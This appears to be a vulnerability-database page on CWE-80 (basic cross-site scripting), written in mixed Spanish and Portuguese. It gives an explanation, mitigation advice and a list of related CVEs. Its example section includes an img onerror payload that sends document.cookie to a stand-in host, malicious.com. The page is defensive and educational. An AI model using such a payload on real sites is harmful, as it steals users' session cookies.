Fallos del tipo CWE-80

586 resultados

Falta de neutralização de tags HTML relacionadas a scripts (XSS básico)

Quando uma aplicação web recebe dados do usuário e os insere diretamente no HTML da página sem sanitização ou escapamento, um atacante consegue injetar tags e scripts maliciosos que executam no navegador de outros usuários. É um dos tipos mais comuns de XSS (Cross-Site Scripting) e permite roubo de sessão, credenciais ou redirecionamento para sites maliciosos.

Ejemplo

Um formulário de busca que mostra o termo pesquisado na página sem validação: se o usuário entra <script>alert('xss')</script>, o script executa. Ou um campo de comentário que exibe <img src=x onerror='fetch(malicious.com?cookie='+document.cookie+')'>, roubando o cookie da sessão.

Cómo mitigar

Sempre escapar/encodar saídas HTML (ex: converter < para &lt;, > para &gt;), usar Content Security Policy (CSP) nos headers HTTP, e validar/sanitizar entrada no servidor. Em JavaScript, prefira textContent no lugar de innerHTML quando possível; em frameworks, use templating seguro (React, Vue escapam por padrão).

CVE-2024-26482HIGHAn HTML injection vulnerability exists in the Edit Content Layout module of Kirby CMS v4.1.0. NOTE: the vendor disputes the significance of EPSS 0.3%CVE-2024-20460MEDIUMCisco ATA 190 Series Analog Telephone Adapter Firmware Reflected Cross-Site Scripting VulnerabilityEPSS 0.3%CVE-2019-18944MEDIUMMicro Focus Solutions Business Manager Application Repository versions prior to 11.7.1 are vulnerable to reflected XSS.EPSS 0.3%CVE-2025-57928MEDIUMWordPress AWP Classifieds plugin <= 4.4.3 - Content Injection vulnerabilityEPSS 0.3%CVE-2024-13497HIGHWordPress form builder plugin for contact forms, surveys and quizzes – Tripetto <= 8.0.9 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.3%CVE-2025-64225MEDIUMWordPress Stockie Extra plugin <= 1.2.11 - Content Injection vulnerabilityEPSS 0.3%CVE-2023-46235MEDIUMFOG stored XSS on log screen via unsanitized request loggingEPSS 0.3%CVE-2026-54570MEDIUMAngleSharp: HTML5 Spec Compliance: mXSS via annotation-xml HTML Integration Point BypassEPSS 0.3%CVE-2026-25578MEDIUMNavidrome is vulnerable to XSS via comment from song metadataEPSS 0.3%CVE-2023-48285MEDIUMWordPress Accept Stripe Payments plugin <= 2.0.79 - Content Injection vulnerabilityEPSS 0.3%CVE-2023-35006MEDIUMIBM Security ReaQta HTML injectionEPSS 0.3%CVE-2025-0276MEDIUMHCL BigFix Modern Client Management (MCM) is affected by an insecure Content Security Policy (CSP)EPSS 0.3%CVE-2025-0277MEDIUMHCL BigFix Mobile is affected by an insecure Content Security Policy (CSP)EPSS 0.3%CVE-2023-47869MEDIUMWordPress wpForo plugin <= 2.2.5 - Broken Access Control + CSRF vulnerabilityEPSS 0.3%CVE-2024-35112MEDIUMIBM Control Center cross-site scriptingEPSS 0.3%CVE-2025-52902HIGHFile Browser has Stored Cross-Site Scripting vulnerabilityEPSS 0.3%CVE-2025-10496HIGHCookie Notice & Consent <= 1.6.5 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.3%CVE-2026-33080HIGHFilament: Unvalidated Range and Values summarizer values can be used for XSSEPSS 0.3%CVE-2026-57533LOWMalicious HTML content could be injected into the page pretix shows when redirection to an untrusted page occurs. Since this page has a CoEPSS 0.3%CVE-2025-27099MEDIUMTuleap allows XSS via the tracker names used in the semantic timeframe deletion messageEPSS 0.3%